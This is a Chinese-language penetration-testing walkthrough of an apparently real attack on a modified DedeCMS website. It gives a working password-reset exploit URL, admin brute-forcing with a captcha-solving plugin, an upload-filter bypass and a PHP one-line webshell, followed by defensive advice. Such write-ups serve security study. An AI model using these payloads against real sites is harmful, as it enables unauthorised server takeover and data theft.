实战项目|对dedecms二改后的真实渗透
字数 1217 2025-08-11 00:55:07
实战项目:对DedeCMS二次修改后的渗透测试教学文档
1. 项目背景
- 目标系统:DedeCMS(织梦内容管理系统)二次修改版本
- 系统特点:PHP开源CMS,常见于国内中小型网站,历史漏洞较多
- 渗透目标:通过信息收集、漏洞利用、权限提升获取服务器权限
2. 信息收集阶段
-
基础信息确认:
- CMS类型:DedeCMS(通过浏览器插件识别)
- 服务器环境:Windows Server + Apache
- 编程语言:PHP
-
敏感文件探测:
robots.txt:发现测试账号test1(无密码)- 目录扫描(御剑工具):
- 网站源码压缩包(可能泄露数据库配置)
- 前台登录地址(如
/login.php)
-
接口与参数分析:
- 检查网络请求中的带参数URL(如
?id=1),测试XSS、SQL注入等(本案例仅发现XSS,无直接利用价值)
- 检查网络请求中的带参数URL(如
3. 漏洞利用
-
Nday漏洞利用:
- 漏洞名称:DedeCMS前台任意用户密码修改漏洞
- Payload:
/member/resetpassword.php?dopost=safequestion&id=1&userid=admin&safequestion=00&safeanswer=0&vdcode=[验证码] - 利用步骤:
- 修改
id参数遍历用户(发现id=1对应管理员hejun)。 - 替换
userid为目标用户(如hejun),提交后访问返回的URL(需删除amp;等编码字符)。 - 成功重置密码(如
hejun的密码被修改为admin888)。
- 修改
-
后台路径爆破:
- 使用工具(如GitHub开源后台扫描器)发现后台地址:
/dede/login.php(非默认路径)。
- 使用工具(如GitHub开源后台扫描器)发现后台地址:
-
弱口令登录:
- 爆破管理员账号
hejun,密码admin888(通过BurpSuite+验证码识别插件绕过)。
- 爆破管理员账号
4. 权限提升与Getshell
-
后台功能点测试:
- 发现部分功能报错,但存在文件上传点(如“上传新文件”)。
-
文件上传绕过:
- 上传图片马(如
shell.jpg),内容为伪装的一句话木马:<?php @eval($_POST['cmd']);?> - 修改后缀为
.php或利用解析漏洞(如Apache畸形解析)。
- 上传图片马(如
-
连接Webshell:
- 使用蚁剑连接上传的Shell,获取服务器权限。
5. 关键技巧总结
- 信息收集:优先检查
robots.txt、压缩包、默认后台路径。 - Nday利用:结合已知漏洞和参数遍历(如
id越权)。 - 验证码绕过:使用BurpSuite插件(如
captcha-killer)自动化识别。 - 文件上传:结合后缀修改、内容伪装、解析漏洞绕过WAF。
6. 防御建议
- 系统层:升级DedeCMS至最新版本,关闭不必要的功能(如前台密码重置)。
- 权限控制:限制后台访问IP,禁用弱口令。
- 文件上传:校验文件类型与内容,禁止执行上传目录的PHP文件。
7. 资源附录
- 工具清单:
- 御剑(目录扫描)
- BurpSuite(漏洞利用、爆破)
- 蚁剑(Webshell管理)
- 插件推荐:BurpSuite验证码识别插件(需配置OCR接口)。
注:实际渗透需遵守法律,本文仅用于技术研究。